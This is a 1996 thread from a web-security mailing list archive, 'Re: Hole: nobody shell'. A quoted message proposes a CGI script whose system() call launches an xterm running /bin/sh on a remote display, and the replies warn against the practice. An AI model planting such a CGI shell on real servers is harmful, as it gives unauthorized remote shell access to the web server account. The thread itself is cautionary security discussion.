[3692] in WWW Security List Archive

home help back first fref pref prev next nref lref last post

Re: Hole: nobody shell

daemon@ATHENA.MIT.EDU (Byron Chun)
Wed Dec 4 15:01:27 1996

Date: Wed, 4 Dec 1996 09:31:47 -0800
To: www-security@ns2.rutgers.edu
From: Byron Chun <byron@wellsfargo.com>
Errors-To: owner-www-security@ns2.rutgers.edu

I don't think putting system(), fork(), or other such calls is a good idea,
even if it simplifies the task since you are risking a system compromise.

Byron Chun

Beware of Trojan Horses.


At 02:15 AM 12/4/96 -0500, Brian Harvell wrote:
>> 
>> I was experimenting with cgi scripts when I came up with this idea:
>> 
>> What if I have a cgi script which does the followin:
>> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
>> 
>> I can now pop an exterm on my display as nobody.
>> This way any user can gain access to the nobody account and 
>> have fun with it...
>> 
>> Has this been discussed anywhere?
>> Is there a fix out there?
>> 
>Yeah don't do it. You can do things a lot worse if you wanted.
>
>Brian
>
>
>Brian Harvell           harvell@iNet.net        http://www.iNet.net/~harvell
>echo '[q]sa[ln0=aln256%Pln256/snlbx]sb3135071790101768542287578439snlbxq'|dc
>
>
>
===================================
Byron Chun
byron@wellsfargo.com
"Calm down. It's only 1's and 0's."


home help back first fref pref prev next nref lref last post